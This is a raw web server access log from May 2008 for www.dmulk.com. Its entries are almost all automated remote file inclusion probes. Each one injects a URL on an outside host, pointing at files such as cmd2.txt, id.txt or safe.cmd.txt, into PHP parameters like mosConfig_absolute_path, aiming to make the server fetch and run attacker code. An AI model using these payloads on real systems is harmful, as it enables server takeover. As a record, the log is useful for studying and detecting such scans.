200.82.111.68 - - [04/May/2008:09:51:26 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:51:56 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:51:57 -0700] "GET /logs/index1.php?site=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:51:59 -0700] "GET /index1.php?site=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:09:52:09 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:09:52:09 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:09:52:09 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:52:25 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:52:45 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:52:52 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:09:53:28 -0700] "GET /logs/access_080308.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.terravitagolfclub.com/weather/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:53:28 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:09:53:29 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.terravitagolfclub.com/weather/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:53:34 -0700] "GET /logs/index.php?incl=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:53:38 -0700] "GET /index.php?incl=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:54:03 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:09:54:09 -0700] "GET /logs//main.php?sayfa=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:09:54:09 -0700] "GET //main.php?sayfa=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:54:31 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.dmulk.com"
61.70.204.99 - - [04/May/2008:09:54:41 -0700] "GET /logs/access_080315.log//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [04/May/2008:09:54:42 -0700] "GET /logs//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:54:45 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:54:45 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:54:46 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:54:46 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:54:49 -0700] "GET /logs/access_080228.log/DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:54:49 -0700] "GET /DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:54:49 -0700] "GET /logs/DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:54:59 -0700] "GET /logs/access_080228.log/DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:54:59 -0700] "GET /DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:55:00 -0700] "GET /logs/DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:09:55:07 -0700] "GET //ashnews.php?pathtoashnews=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:09:55:33 -0700] "GET /logs/access_080228.log/DORK:http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:09:55:33 -0700] "GET /DORK:http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:09:55:34 -0700] "GET /logs/DORK:http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:09:55:57 -0700] "GET /DORK:http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [04/May/2008:09:56:42 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [04/May/2008:09:56:43 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [04/May/2008:09:56:43 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:56:48 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:09:56:51 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:56:53 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:56:59 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:57:00 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.71.90.185 - - [04/May/2008:09:57:17 -0700] "GET /logs/access_080215.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:57:47 -0700] "GET /DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:09:57:47 -0700] "GET /DORK:http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:09:58:16 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:09:58:16 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:09:58:21 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:58:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:58:46 -0700] "GET //skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:58:59 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:58:59 -0700] "GET /logs/index1.php?site=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:58:59 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:58:59 -0700] "GET /index1.php?site=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:59:00 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:09:59:30 -0700] "GET /phphtml.php?htmlclass_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.95.179.166 - - [04/May/2008:09:59:44 -0700] "GET / HTTP/1.0" 200 11590 "-" "Python-urllib/2.1" "www.dmulk.com"
196.35.158.180 - - [04/May/2008:09:59:45 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:59:48 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.181 - - [04/May/2008:09:59:53 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [04/May/2008:09:59:53 -0700] "GET /index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.76" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:00:08 -0700] "GET /logs/access_080312.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:00:14 -0700] "GET //?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:00:14 -0700] "GET /logs//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 45988 "-" "libwww-perl/5.65" "www.dmulk.com"
68.165.216.146 - - [04/May/2008:10:00:17 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [04/May/2008:10:00:17 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:00:25 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:00:25 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:00:27 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:00:39 -0700] "GET /logs/access_071216.log//spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:00:39 -0700] "GET //spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:00:39 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:00:42 -0700] "GET /logs/access_080131.log//spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:00:53 -0700] "GET /logs/access_071111.log/index.php?seite=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:10:00:56 -0700] "GET /logs//include.php?path[docroot]=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:10:00:57 -0700] "GET //include.php?path[docroot]=http://cinta.sitesled.com/batam/cream/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:00:57 -0700] "GET /index.php?seite=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:00:58 -0700] "GET /logs/index.php?seite=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:01:00 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:01:00 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.156.192.5 - - [04/May/2008:10:01:26 -0700] "GET /logs//include.php?path[docroot]=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.156.192.5 - - [04/May/2008:10:01:26 -0700] "GET //include.php?path[docroot]=http://aceperform.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:01:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:10:01:33 -0700] "GET /forum.php?act=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:01:47 -0700] "GET //?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:10:02:22 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:10:02:22 -0700] "GET /logs//ashnews.php?pathtoashnews=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:02:35 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:02:35 -0700] "GET /logs/access_080312.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:02:36 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:02:36 -0700] "GET /logs//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:02:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:02:43 -0700] "GET /logs/access_080311.log//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:02:44 -0700] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:02:44 -0700] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:03:11 -0700] "GET /logs/access_080311.log//agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:03:11 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:03:11 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:03:12 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:03:23 -0700] "GET /logs/access_071024.log/index.php?seite=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:03:27 -0700] "GET /logs/public_includes/pub_blocks/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:03:27 -0700] "GET /public_includes/pub_blocks/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:03:36 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:10:03:44 -0700] "GET /logs//atom.php5?page=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:10:03:44 -0700] "GET //atom.php5?page=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:03:53 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:03:53 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:03:53 -0700] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:03:53 -0700] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:03:54 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [04/May/2008:10:03:54 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:04:00 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:04:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:04:22 -0700] "GET //skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:04:25 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:04:43 -0700] "GET /logs/index1.php?choix=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:04:43 -0700] "GET /index1.php?choix=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:10:05:03 -0700] "GET /logs/access_080218.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
